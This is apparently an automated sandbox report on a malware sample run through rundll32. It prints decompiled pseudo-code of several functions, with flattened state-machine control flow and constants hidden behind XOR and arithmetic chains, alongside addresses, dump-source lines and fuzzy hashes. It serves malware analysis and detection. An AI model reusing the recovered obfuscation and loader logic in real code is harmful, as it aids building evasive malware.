                                                                                                                                  				signed int _t256;
                                                                                                                                  				signed int _t257;
                                                                                                                                  				intOrPtr _t258;
                                                                                                                                  				intOrPtr* _t259;
                                                                                                                                  				signed int _t260;
                                                                                                                                  				signed int* _t261;
                                                                                                                                  
                                                                                                                                  				_t261 =  &_v100;
                                                                                                                                  				_v12 = 0xf244e3;
                                                                                                                                  				_v8 = 0x291d6d;
                                                                                                                                  				_t225 = 0x37f2dd7;
                                                                                                                                  				_t251 = 0;
                                                                                                                                  				_v4 = 0;
                                                                                                                                  				_v68 = 0x555e8d;
                                                                                                                                  				_v68 = _v68 + 0xfffff532;
                                                                                                                                  				_v68 = _v68 | 0x235b50f0;
                                                                                                                                  				_v68 = _v68 ^ 0x235e53ff;
                                                                                                                                  				_v84 = 0xf72ec;
                                                                                                                                  				_v84 = _v84 >> 7;
                                                                                                                                  				_t252 = 0x19;
                                                                                                                                  				_v84 = _v84 / _t252;
                                                                                                                                  				_v84 = _v84 << 3;
                                                                                                                                  				_v84 = _v84 ^ 0x000f09df;
                                                                                                                                  				_v20 = 0xee8389;
                                                                                                                                  				_t253 = 0x51;
                                                                                                                                  				_v20 = _v20 * 0x29;
                                                                                                                                  				_v20 = _v20 ^ 0x2635dc09;
                                                                                                                                  				_v88 = 0xea545e;
                                                                                                                                  				_t30 =  &_v88; // 0xea545e
                                                                                                                                  				_v88 =  *_t30 / _t253;
                                                                                                                                  				_t36 =  &_v88; // 0xea545e
                                                                                                                                  				_t254 = 0x7a;
                                                                                                                                  				_v88 =  *_t36 * 0x1c;
                                                                                                                                  				_v88 = _v88 + 0xc9a8;
                                                                                                                                  				_v88 = _v88 ^ 0x005db592;
                                                                                                                                  				_v24 = 0x448750;
                                                                                                                                  				_v24 = _v24 / _t254;
                                                                                                                                  				_v24 = _v24 ^ 0x000cab3c;
                                                                                                                                  				_v28 = 0x8cea36;
                                                                                                                                  				_v28 = _v28 * 0x38;
                                                                                                                                  				_v28 = _v28 ^ 0x1eda9ad9;
                                                                                                                                  				_v100 = 0x8110ba;
                                                                                                                                  				_v100 = _v100 + 0x3ab9;
                                                                                                                                  				_v100 = _v100 ^ 0x336ca884;
                                                                                                                                  				_v100 = _v100 + 0xffff8c66;
                                                                                                                                  				_v100 = _v100 ^ 0x33e0711c;
                                                                                                                                  				_v64 = 0x5ca85e;
                                                                                                                                  				_v64 = _v64 >> 0x10;
                                                                                                                                  				_v64 = _v64 * 0x4e;
                                                                                                                                  				_v64 = _v64 ^ 0x000b11ab;
                                                                                                                                  				_v44 = 0x2bb2b6;
                                                                                                                                  				_v44 = _v44 | 0xbbfbcd5f;
                                                                                                                                  				_v44 = _v44 ^ 0xbbf16182;
                                                                                                                                  				_v72 = 0x855f4c;
                                                                                                                                  				_v72 = _v72 ^ 0x87656771;
                                                                                                                                  				_v72 = _v72 * 0x71;
                                                                                                                                  				_v72 = _v72 ^ 0xf9f8e59a;
                                                                                                                                  				_v96 = 0x938339;
                                                                                                                                  				_v96 = _v96 << 8;
                                                                                                                                  				_v96 = _v96 << 0xf;
                                                                                                                                  				_v96 = _v96 ^ 0xcc040e17;
                                                                                                                                  				_v96 = _v96 ^ 0x50841052;
                                                                                                                                  				_v40 = 0xbe1d32;
                                                                                                                                  				_v40 = _v40 + 0x9b9c;
                                                                                                                                  				_v40 = _v40 ^ 0x00bc2d0e;
                                                                                                                                  				_v56 = 0x9e5686;
                                                                                                                                  				_v56 = _v56 + 0xffffd134;
                                                                                                                                  				_v56 = _v56 + 0xffff1440;
                                                                                                                                  				_v56 = _v56 ^ 0x0091c9b6;
                                                                                                                                  				_v60 = 0xb7e614;
                                                                                                                                  				_v60 = _v60 << 3;
                                                                                                                                  				_v60 = _v60 >> 8;
                                                                                                                                  				_v60 = _v60 ^ 0x00065aea;
                                                                                                                                  				_v32 = 0x537989;
                                                                                                                                  				_v32 = _v32 + 0xffff7fce;
                                                                                                                                  				_v32 = _v32 ^ 0x005430a6;
                                                                                                                                  				_v92 = 0x1586eb;
                                                                                                                                  				_t255 = 0x27;
                                                                                                                                  				_v92 = _v92 * 0x18;
                                                                                                                                  				_v92 = _v92 >> 7;
                                                                                                                                  				_v92 = _v92 * 0x26;
                                                                                                                                  				_v92 = _v92 ^ 0x009f543a;
                                                                                                                                  				_v52 = 0xc32f0b;
                                                                                                                                  				_v52 = _v52 | 0xcd8d244f;
                                                                                                                                  				_v52 = _v52 >> 4;
                                                                                                                                  				_v52 = _v52 ^ 0x0cd427c3;
                                                                                                                                  				_v36 = 0xd9cf6a;
                                                                                                                                  				_v36 = _v36 / _t255;
                                                                                                                                  				_v36 = _v36 ^ 0x000f5a1a;
                                                                                                                                  				_v16 = 0xbb623f;
                                                                                                                                  				_v16 = _v16 ^ 0xe760556d;
                                                                                                                                  				_v16 = _v16 ^ 0xe7dfff62;
                                                                                                                                  				_v76 = 0x7fa35c;
                                                                                                                                  				_v76 = _v76 >> 0xa;
                                                                                                                                  				_v76 = _v76 + 0xffff049d;
                                                                                                                                  				_v76 = _v76 ^ 0x38c60922;
                                                                                                                                  				_v76 = _v76 ^ 0xc73f93c8;
                                                                                                                                  				_v80 = 0x34ea16;
                                                                                                                                  				_v80 = _v80 | 0x70dfffff;
                                                                                                                                  				_t256 = 0x78;
                                                                                                                                  				_t257 = _v16;
                                                                                                                                  				_t260 = _v16;
                                                                                                                                  				_t224 = _v16;
                                                                                                                                  				_v80 = _v80 / _t256;
                                                                                                                                  				_v80 = _v80 ^ 0x00f0b2be;
                                                                                                                                  				_v48 = 0x2ab377;
                                                                                                                                  				_v48 = _v48 << 0xd;
                                                                                                                                  				_v48 = _v48 + 0x21bb;
                                                                                                                                  				_v48 = _v48 ^ 0x5663e2ae;
                                                                                                                                  				while(1) {
                                                                                                                                  					L1:
                                                                                                                                  					_push(0x5c);
                                                                                                                                  					while(_t225 != 0xb8820d) {
                                                                                                                                  						if(_t225 == 0x1effdba) {
                                                                                                                                  							_t219 = E002D912C(_v84, _v20, _t225, _v88, _t225, _v24, _v28);
                                                                                                                                  							_t224 = _t219;
                                                                                                                                  							_t261 =  &(_t261[5]);
                                                                                                                                  							if(_t219 != 0) {
                                                                                                                                  								_t225 = 0xb9a00d9;
                                                                                                                                  								goto L11;
                                                                                                                                  							}
                                                                                                                                  						} else {
                                                                                                                                  							if(_t225 == 0x37f2dd7) {
                                                                                                                                  								_t225 = 0x43cb3ac;
                                                                                                                                  								continue;
                                                                                                                                  							} else {
                                                                                                                                  								if(_t225 == 0x43cb3ac) {
                                                                                                                                  									_t258 =  *0x2f3e10; // 0x0
                                                                                                                                  									_t259 = _t258 + 0x1c;
                                                                                                                                  									while( *_t259 != _t246) {
                                                                                                                                  										_t259 = _t259 + 2;
                                                                                                                                  									}
                                                                                                                                  									_t257 = _t259 + 2;
                                                                                                                                  									_t225 = 0x1effdba;
                                                                                                                                  									goto L12;
                                                                                                                                  								} else {
                                                                                                                                  									if(_t225 == 0x5d9bea5) {
                                                                                                                                  										E002E8F9E(_v32, _v92, _v52, _v36, _t260);
                                                                                                                                  										_t261 =  &(_t261[3]);
                                                                                                                                  										_t225 = 0xb8820d;
                                                                                                                                  										goto L11;
                                                                                                                                  									} else {
                                                                                                                                  										if(_t225 == _t218) {
                                                                                                                                  											E002DE249(_v96, _t260, _v40, _v56, _v60);
                                                                                                                                  											_t261 =  &(_t261[3]);
                                                                                                                                  											_t251 =  !=  ? 1 : _t251;
                                                                                                                                  											_t225 = 0x5d9bea5;
                                                                                                                                  											L11:
                                                                                                                                  											_t246 = 0x5c;
                                                                                                                                  											L12:
                                                                                                                                  											_t218 = 0x9850ebe;
                                                                                                                                  											continue;
                                                                                                                                  										} else {
                                                                                                                                  											if(_t225 != 0xb9a00d9) {
                                                                                                                                  												L22:
                                                                                                                                  												if(_t225 != 0x8a80d0f) {
                                                                                                                                  													continue;
                                                                                                                                  												}
                                                                                                                                  											} else {
                                                                                                                                  												_t260 = E002D42C4(_v100, _t224, _v64, _v68, _t257, _v44, _v72);
                                                                                                                                  												_t261 =  &(_t261[5]);
                                                                                                                                  												_t218 = 0x9850ebe;
                                                                                                                                  												_t225 =  !=  ? 0x9850ebe : 0xb8820d;
                                                                                                                                  												goto L1;
                                                                                                                                  											}
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						return _t251;
                                                                                                                                  					}
                                                                                                                                  					E002E8F9E(_v16, _v76, _v80, _v48, _t224);
                                                                                                                                  					_t261 =  &(_t261[3]);
                                                                                                                                  					_t225 = 0x8a80d0f;
                                                                                                                                  					_t218 = 0x9850ebe;
                                                                                                                                  					_t246 = 0x5c;
                                                                                                                                  					goto L22;
                                                                                                                                  				}
                                                                                                                                  			}

                                                                                                                                  0x002e4947
                                                                                                                                  0x002e494b
                                                                                                                                  0x002e4955
                                                                                                                                  0x002e4959
                                                                                                                                  0x002e4961
                                                                                                                                  0x002e4969
                                                                                                                                  0x002e4971
                                                                                                                                  0x002e4976
                                                                                                                                  0x002e497e
                                                                                                                                  0x002e498e
                                                                                                                                  0x002e4992
                                                                                                                                  0x002e499a
                                                                                                                                  0x002e49a2
                                                                                                                                  0x002e49aa
                                                                                                                                  0x002e49b2
                                                                                                                                  0x002e49ba
                                                                                                                                  0x002e49bf
                                                                                                                                  0x002e49c7
                                                                                                                                  0x002e49cf
                                                                                                                                  0x002e49d7
                                                                                                                                  0x002e49df
                                                                                                                                  0x002e49eb
                                                                                                                                  0x002e49ee
                                                                                                                                  0x002e49f2
                                                                                                                                  0x002e49f6
                                                                                                                                  0x002e49fa
                                                                                                                                  0x002e4a03
                                                                                                                                  0x002e4a0b
                                                                                                                                  0x002e4a13
                                                                                                                                  0x002e4a18
                                                                                                                                  0x002e4a20
                                                                                                                                  0x002e4a28
                                                                                                                                  0x002e4a28
                                                                                                                                  0x002e4a28
                                                                                                                                  0x002e4a2b
                                                                                                                                  0x002e4a3d
                                                                                                                                  0x002e4b36
                                                                                                                                  0x002e4b3b
                                                                                                                                  0x002e4b3d
                                                                                                                                  0x002e4b42
                                                                                                                                  0x002e4b44
                                                                                                                                  0x00000000
                                                                                                                                  0x002e4b44
                                                                                                                                  0x002e4a43
                                                                                                                                  0x002e4a49
                                                                                                                                  0x002e4b16
                                                                                                                                  0x00000000
                                                                                                                                  0x002e4a4f
                                                                                                                                  0x002e4a55
                                                                                                                                  0x002e4af9
                                                                                                                                  0x002e4aff
                                                                                                                                  0x002e4b07
                                                                                                                                  0x002e4b04
                                                                                                                                  0x002e4b04
                                                                                                                                  0x002e4b0c
                                                                                                                                  0x002e4b0f
                                                                                                                                  0x00000000
                                                                                                                                  0x002e4a5b
                                                                                                                                  0x002e4a61
                                                                                                                                  0x002e4aea
                                                                                                                                  0x002e4aef
                                                                                                                                  0x002e4af2
                                                                                                                                  0x00000000
                                                                                                                                  0x002e4a63
                                                                                                                                  0x002e4a65
                                                                                                                                  0x002e4ab7
                                                                                                                                  0x002e4abe
                                                                                                                                  0x002e4ac4
                                                                                                                                  0x002e4ac7
                                                                                                                                  0x002e4acc
                                                                                                                                  0x002e4ace
                                                                                                                                  0x002e4acf
                                                                                                                                  0x002e4acf
                                                                                                                                  0x00000000
                                                                                                                                  0x002e4a67
                                                                                                                                  0x002e4a6d
                                                                                                                                  0x002e4b71
                                                                                                                                  0x002e4b77
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002e4a73
                                                                                                                                  0x002e4a8f
                                                                                                                                  0x002e4a91
                                                                                                                                  0x002e4a9b
                                                                                                                                  0x002e4aa0
                                                                                                                                  0x00000000
                                                                                                                                  0x002e4aa0
                                                                                                                                  0x002e4a6d
                                                                                                                                  0x002e4a65
                                                                                                                                  0x002e4a61
                                                                                                                                  0x002e4a55
                                                                                                                                  0x002e4a49
                                                                                                                                  0x002e4b86
                                                                                                                                  0x002e4b86
                                                                                                                                  0x002e4b5c
                                                                                                                                  0x002e4b61
                                                                                                                                  0x002e4b64
                                                                                                                                  0x002e4b69
                                                                                                                                  0x002e4b70
                                                                                                                                  0x00000000
                                                                                                                                  0x002e4b70

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ^T$mU`
                                                                                                                                  • API String ID: 0-1245783925
                                                                                                                                  • Opcode ID: 1decdf600921c8786d0583e8c1f2aed5f8152c6794b34bf2c2c7af9cd0023f01
                                                                                                                                  • Instruction ID: fd4cbc5e929e86af3409efe7e005be5d23c257e08aaf45350ba4486e7f9311df
                                                                                                                                  • Opcode Fuzzy Hash: 1decdf600921c8786d0583e8c1f2aed5f8152c6794b34bf2c2c7af9cd0023f01
                                                                                                                                  • Instruction Fuzzy Hash: B4B141715183419FC318DF26899A41BFBE1FBC8758F508A1DF69A96260D3B1CA19CF82
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                  			E002EA666(intOrPtr* __ecx) {
                                                                                                                                  				char _v128;
                                                                                                                                  				signed int _v132;
                                                                                                                                  				signed int _v136;
                                                                                                                                  				signed int _v140;
                                                                                                                                  				intOrPtr* _v144;
                                                                                                                                  				signed int _v148;
                                                                                                                                  				signed int _v152;
                                                                                                                                  				signed int _v156;
                                                                                                                                  				signed int _v160;
                                                                                                                                  				signed int _v164;
                                                                                                                                  				signed int _v168;
                                                                                                                                  				signed int _v172;
                                                                                                                                  				signed int _v176;
                                                                                                                                  				signed int _v180;
                                                                                                                                  				signed int _v184;
                                                                                                                                  				signed int _v188;
                                                                                                                                  				signed int _v192;
                                                                                                                                  				signed int _v196;
                                                                                                                                  				signed int _v200;
                                                                                                                                  				signed int _v204;
                                                                                                                                  				signed int _v208;
                                                                                                                                  				void* _t185;
                                                                                                                                  				void* _t187;
                                                                                                                                  				signed int _t194;
                                                                                                                                  				signed int _t203;
                                                                                                                                  				intOrPtr* _t204;
                                                                                                                                  				signed int _t231;
                                                                                                                                  				signed int _t232;
                                                                                                                                  				signed int _t233;
                                                                                                                                  				signed int _t234;
                                                                                                                                  				signed int _t235;
                                                                                                                                  				void* _t236;
                                                                                                                                  				signed int _t239;
                                                                                                                                  				signed int* _t240;
                                                                                                                                  
                                                                                                                                  				_t204 = __ecx;
                                                                                                                                  				_t240 =  &_v208;
                                                                                                                                  				_v144 = __ecx;
                                                                                                                                  				_v188 = 0x57b051;
                                                                                                                                  				_v188 = _v188 ^ 0x0e33ee27;
                                                                                                                                  				_v188 = _v188 * 0x1d;
                                                                                                                                  				_t236 = 0xac5721c;
                                                                                                                                  				_v188 = _v188 << 4;
                                                                                                                                  				_v188 = _v188 ^ 0x15e508b7;
                                                                                                                                  				_v156 = 0xb3c586;
                                                                                                                                  				_v156 = _v156 + 0xc4f5;
                                                                                                                                  				_v156 = _v156 ^ 0x00bed25a;
                                                                                                                                  				_v168 = 0x711032;
                                                                                                                                  				_v168 = _v168 << 8;
                                                                                                                                  				_v168 = _v168 + 0x5169;
                                                                                                                                  				_v168 = _v168 ^ 0x711dace8;
                                                                                                                                  				_v192 = 0xa2549d;
                                                                                                                                  				_v192 = _v192 + 0x52ae;
                                                                                                                                  				_v192 = _v192 >> 1;
                                                                                                                                  				_v192 = _v192 >> 3;
                                                                                                                                  				_v192 = _v192 ^ 0x000eb53b;
                                                                                                                                  				_v140 = 0xe7e5a1;
                                                                                                                                  				_t231 = 0x32;
                                                                                                                                  				_v140 = _v140 * 0x50;
                                                                                                                                  				_v140 = _v140 ^ 0x4874e895;
                                                                                                                                  				_v208 = 0x1967bb;
                                                                                                                                  				_v208 = _v208 << 4;
                                                                                                                                  				_v208 = _v208 | 0x201d9a42;
                                                                                                                                  				_v208 = _v208 / _t231;
                                                                                                                                  				_v208 = _v208 ^ 0x00a7f54f;
                                                                                                                                  				_v152 = 0x52a7fc;
                                                                                                                                  				_v152 = _v152 + 0x45a2;
                                                                                                                                  				_v152 = _v152 ^ 0x0052edd3;
                                                                                                                                  				_v160 = 0x3027b3;
                                                                                                                                  				_v160 = _v160 + 0xfd14;
                                                                                                                                  				_v160 = _v160 ^ 0x0036c553;
                                                                                                                                  				_v180 = 0x38862e;
                                                                                                                                  				_v180 = _v180 ^ 0x0f350481;
                                                                                                                                  				_t232 = 0x7c;
                                                                                                                                  				_v180 = _v180 * 0x65;
                                                                                                                                  				_v180 = _v180 ^ 0xf053ee57;
                                                                                                                                  				_v136 = 0x356a19;
                                                                                                                                  				_v136 = _v136 ^ 0xbed63dcb;
                                                                                                                                  				_v136 = _v136 ^ 0xbeeb3706;
                                                                                                                                  				_v164 = 0x14aaf;
                                                                                                                                  				_v164 = _v164 + 0xffffc1af;
                                                                                                                                  				_v164 = _v164 ^ 0x000285a1;
                                                                                                                                  				_v200 = 0x7f3e04;
                                                                                                                                  				_v200 = _v200 * 0x53;
                                                                                                                                  				_v200 = _v200 + 0xffffdc1b;
                                                                                                                                  				_v200 = _v200 + 0x69f9;
                                                                                                                                  				_v200 = _v200 ^ 0x2945b47b;
                                                                                                                                  				_v148 = 0xc6ed1e;
                                                                                                                                  				_v148 = _v148 >> 6;
                                                                                                                                  				_v148 = _v148 ^ 0x0006dab0;
                                                                                                                                  				_v172 = 0x6d07b9;
                                                                                                                                  				_v172 = _v172 / _t232;
                                                                                                                                  				_t233 = 0x35;
                                                                                                                                  				_v172 = _v172 / _t233;
                                                                                                                                  				_v172 = _v172 ^ 0x00041e3e;
                                                                                                                                  				_v204 = 0x57aab;
                                                                                                                                  				_v204 = _v204 + 0xdcdc;
                                                                                                                                  				_v204 = _v204 * 0x48;
                                                                                                                                  				_v204 = _v204 << 8;
                                                                                                                                  				_v204 = _v204 ^ 0xc89fb5e3;
                                                                                                                                  				_v132 = 0xff84eb;
                                                                                                                                  				_v132 = _v132 << 5;
                                                                                                                                  				_v132 = _v132 ^ 0x1ff23c26;
                                                                                                                                  				_v196 = 0xcb0ee1;
                                                                                                                                  				_v196 = _v196 | 0xd8d8bfc1;
                                                                                                                                  				_v196 = _v196 << 4;
                                                                                                                                  				_v196 = _v196 ^ 0x8dbe7284;
                                                                                                                                  				_v184 = 0x3f345e;
                                                                                                                                  				_t234 = 0x7b;
                                                                                                                                  				_v184 = _v184 * 0x5e;
                                                                                                                                  				_v184 = _v184 ^ 0x1738d684;
                                                                                                                                  				_v176 = 0x75d12f;
                                                                                                                                  				_t239 = _v184;
                                                                                                                                  				_t203 = _v184;
                                                                                                                                  				_t235 = _v184;
                                                                                                                                  				_v176 = _v176 / _t234;
                                                                                                                                  				_v176 = _v176 + 0xb925;
                                                                                                                                  				_v176 = _v176 ^ 0x0007fac1;
                                                                                                                                  				while(1) {
                                                                                                                                  					L1:
                                                                                                                                  					_t185 = 0x80ddafd;
                                                                                                                                  					do {
                                                                                                                                  						while(_t236 != 0x3002390) {
                                                                                                                                  							if(_t236 == _t185) {
                                                                                                                                  								_push(_v204);
                                                                                                                                  								_push(_v172);
                                                                                                                                  								_t187 = E002EDCF7(_v148, 0x2d1540, __eflags);
                                                                                                                                  								_push(_t235);
                                                                                                                                  								_push( &_v128);
                                                                                                                                  								_push(_t187);
                                                                                                                                  								_push(_t239);
                                                                                                                                  								_push(_t203);
                                                                                                                                  								 *((intOrPtr*)(E002DA42D(0xab2a8d8a, 0x2b7)))();
                                                                                                                                  								E002DA8B0(_v132, _t187, _v196);
                                                                                                                                  								_t236 = 0xc2d90a2;
                                                                                                                                  								goto L11;
                                                                                                                                  							} else {
                                                                                                                                  								if(_t236 == 0x94501ee) {
                                                                                                                                  									_t194 = E002E0AE0(0x10, 1);
                                                                                                                                  									_push(_v140);
                                                                                                                                  									_t239 = _t194;
                                                                                                                                  									_push( &_v128);
                                                                                                                                  									_push(_t239);
                                                                                                                                  									_push(0xb);
                                                                                                                                  									E002D80E3(_v168, _v192);
                                                                                                                                  									_t236 = 0x3002390;
                                                                                                                                  									L11:
                                                                                                                                  									_t240 =  &(_t240[6]);
                                                                                                                                  									L12:
                                                                                                                                  									_t204 = _v144;
                                                                                                                                  									goto L1;
                                                                                                                                  								} else {
                                                                                                                                  									if(_t236 == 0xac5721c) {
                                                                                                                                  										_t236 = 0x94501ee;
                                                                                                                                  										continue;
                                                                                                                                  									} else {
                                                                                                                                  										if(_t236 == 0xc2d90a2) {
                                                                                                                                  											E002E8519(_v184, _v176, _t235);
                                                                                                                                  										} else {
                                                                                                                                  											if(_t236 != 0xd4e1cec) {
                                                                                                                                  												goto L17;
                                                                                                                                  											} else {
                                                                                                                                  												_t239 = 0x4000;
                                                                                                                                  												_push(_t204);
                                                                                                                                  												_push(_t204);
                                                                                                                                  												_t203 = E002D7FF2(0x4000);
                                                                                                                                  												_t185 = 0x80ddafd;
                                                                                                                                  												_t204 = _v144;
                                                                                                                                  												_t236 =  !=  ? 0x80ddafd : 0xc2d90a2;
                                                                                                                                  												continue;
                                                                                                                                  											}
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  							L20:
                                                                                                                                  							return _t203;
                                                                                                                                  						}
                                                                                                                                  						_t235 = E002D4816(_v208,  *((intOrPtr*)(_t204 + 4)), _v152,  *_t204, _v160, _v180);
                                                                                                                                  						_t240 =  &(_t240[4]);
                                                                                                                                  						__eflags = _t235;
                                                                                                                                  						if(__eflags == 0) {
                                                                                                                                  							_t204 = _v144;
                                                                                                                                  							_t236 = 0x99c1651;
                                                                                                                                  							_t185 = 0x80ddafd;
                                                                                                                                  							goto L17;
                                                                                                                                  						} else {
                                                                                                                                  							_t236 = 0xd4e1cec;
                                                                                                                                  							goto L12;
                                                                                                                                  						}
                                                                                                                                  						goto L20;
                                                                                                                                  						L17:
                                                                                                                                  						__eflags = _t236 - 0x99c1651;
                                                                                                                                  					} while (__eflags != 0);
                                                                                                                                  					goto L20;
                                                                                                                                  				}
                                                                                                                                  			}





































                                                                                                                                  0x002ea97a
                                                                                                                                  0x002ea97a
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea8ec
                                                                                                                                  0x002ea8f2
                                                                                                                                  0x002ea93f
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea8f4
                                                                                                                                  0x002ea8fa
                                                                                                                                  0x002eaa1d
                                                                                                                                  0x002ea900
                                                                                                                                  0x002ea906
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea90c
                                                                                                                                  0x002ea910
                                                                                                                                  0x002ea91f
                                                                                                                                  0x002ea920
                                                                                                                                  0x002ea926
                                                                                                                                  0x002ea930
                                                                                                                                  0x002ea936
                                                                                                                                  0x002ea93a
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea93a
                                                                                                                                  0x002ea906
                                                                                                                                  0x002ea8fa
                                                                                                                                  0x002ea8f2
                                                                                                                                  0x002ea8ea
                                                                                                                                  0x002eaa26
                                                                                                                                  0x002eaa2f
                                                                                                                                  0x002eaa2f
                                                                                                                                  0x002ea9e8
                                                                                                                                  0x002ea9ea
                                                                                                                                  0x002ea9ed
                                                                                                                                  0x002ea9ef
                                                                                                                                  0x002ea9f8
                                                                                                                                  0x002ea9fc
                                                                                                                                  0x002eaa01
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea9f1
                                                                                                                                  0x002ea9f1
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea9f1
                                                                                                                                  0x00000000
                                                                                                                                  0x002eaa06
                                                                                                                                  0x002eaa06
                                                                                                                                  0x002eaa06
                                                                                                                                  0x00000000
                                                                                                                                  0x002eaa12

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ^4?$iQ
                                                                                                                                  • API String ID: 0-3971506469
                                                                                                                                  • Opcode ID: fdcf2e6400a40f6aac6da010245ac6ff065029edf9c329bf17638fc17e71eb3a
                                                                                                                                  • Instruction ID: 9b405450af3014ee3b3e8082d3087bdbb16084b7104fb523d1cdf920f5ce38bb
                                                                                                                                  • Opcode Fuzzy Hash: fdcf2e6400a40f6aac6da010245ac6ff065029edf9c329bf17638fc17e71eb3a
                                                                                                                                  • Instruction Fuzzy Hash: E0A152719183809FC354CF2AD58990BFBE1BBC4758F80492DF99AA6260C7B5D9498F83
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                  			E002E8BE3() {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				signed int _v28;
                                                                                                                                  				signed int _v32;
                                                                                                                                  				signed int _v36;
                                                                                                                                  				signed int _v40;
                                                                                                                                  				signed int _v44;
                                                                                                                                  				signed int _v48;
                                                                                                                                  				signed int _v52;
                                                                                                                                  				signed int _v56;
                                                                                                                                  				signed int _v60;
                                                                                                                                  				signed int _v64;
                                                                                                                                  				signed int _v68;
                                                                                                                                  				signed int _v72;
                                                                                                                                  				signed int _v76;
                                                                                                                                  				void* _v88;
                                                                                                                                  				intOrPtr _v92;
                                                                                                                                  				signed int _t203;
                                                                                                                                  				short _t206;
                                                                                                                                  				short _t211;
                                                                                                                                  				signed int _t214;
                                                                                                                                  				void* _t216;
                                                                                                                                  				intOrPtr _t238;
                                                                                                                                  				void* _t239;
                                                                                                                                  				void* _t240;
                                                                                                                                  				short* _t241;
                                                                                                                                  				short* _t242;
                                                                                                                                  				signed int _t243;
                                                                                                                                  				signed int _t244;
                                                                                                                                  				signed int _t245;
                                                                                                                                  				signed int _t246;
                                                                                                                                  				signed int _t247;
                                                                                                                                  				signed int _t248;
                                                                                                                                  				signed int _t249;
                                                                                                                                  				signed int _t250;
                                                                                                                                  				void* _t251;
                                                                                                                                  
                                                                                                                                  				_v92 = 0x476c75;
                                                                                                                                  				asm("stosd");
                                                                                                                                  				_t216 = 0xb7209d2;
                                                                                                                                  				_t243 = 0x73;
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				_t238 =  *0x2f3e10; // 0x0
                                                                                                                                  				_v16 = 0xe95677;
                                                                                                                                  				_t239 = _t238 + 0x1c;
                                                                                                                                  				_v16 = _v16 + 0xffffde88;
                                                                                                                                  				_v16 = _v16 | 0xcd71b475;
                                                                                                                                  				_v16 = _v16 + 0xffffb9cf;
                                                                                                                                  				_v16 = _v16 ^ 0xcdf0e35f;
                                                                                                                                  				_v48 = 0xdf79ef;
                                                                                                                                  				_v48 = _v48 / _t243;
                                                                                                                                  				_t244 = 0x6b;
                                                                                                                                  				_v48 = _v48 * 0x6d;
                                                                                                                                  				_v48 = _v48 ^ 0x00d012e0;
                                                                                                                                  				_v20 = 0x9de8b4;
                                                                                                                                  				_v20 = _v20 + 0xffff612d;
                                                                                                                                  				_v20 = _v20 / _t244;
                                                                                                                                  				_v20 = _v20 ^ 0xc642351f;
                                                                                                                                  				_v20 = _v20 ^ 0xc646a40f;
                                                                                                                                  				_v52 = 0x8fb5bf;
                                                                                                                                  				_v52 = _v52 << 0xa;
                                                                                                                                  				_v52 = _v52 | 0x07a5acc8;
                                                                                                                                  				_v52 = _v52 ^ 0x3ff13d54;
                                                                                                                                  				_v68 = 0x5451dc;
                                                                                                                                  				_v68 = _v68 << 4;
                                                                                                                                  				_v68 = _v68 ^ 0x054b95e9;
                                                                                                                                  				_v56 = 0x52bd8b;
                                                                                                                                  				_v56 = _v56 >> 2;
                                                                                                                                  				_t245 = 0x43;
                                                                                                                                  				_v56 = _v56 * 0x7a;
                                                                                                                                  				_v56 = _v56 ^ 0x09d97bb2;
                                                                                                                                  				_v24 = 0x3d3b88;
                                                                                                                                  				_v24 = _v24 / _t245;
                                                                                                                                  				_v24 = _v24 + 0xfffff551;
                                                                                                                                  				_v24 = _v24 ^ 0x58fd9949;
                                                                                                                                  				_v24 = _v24 ^ 0x58f7485b;
                                                                                                                                  				_v28 = 0x8d7fa4;
                                                                                                                                  				_v28 = _v28 | 0x74f1f66b;
                                                                                                                                  				_v28 = _v28 + 0xbcb0;
                                                                                                                                  				_t246 = 0x1d;
                                                                                                                                  				_v28 = _v28 / _t246;
                                                                                                                                  				_v28 = _v28 ^ 0x0406308a;
                                                                                                                                  				_v76 = 0xb13dbd;
                                                                                                                                  				_v76 = _v76 >> 4;
                                                                                                                                  				_v76 = _v76 ^ 0x0001a54a;
                                                                                                                                  				_v72 = 0x3dff58;
                                                                                                                                  				_v72 = _v72 + 0xffff5d9c;
                                                                                                                                  				_v72 = _v72 ^ 0x00301633;
                                                                                                                                  				_v8 = 0xd63a62;
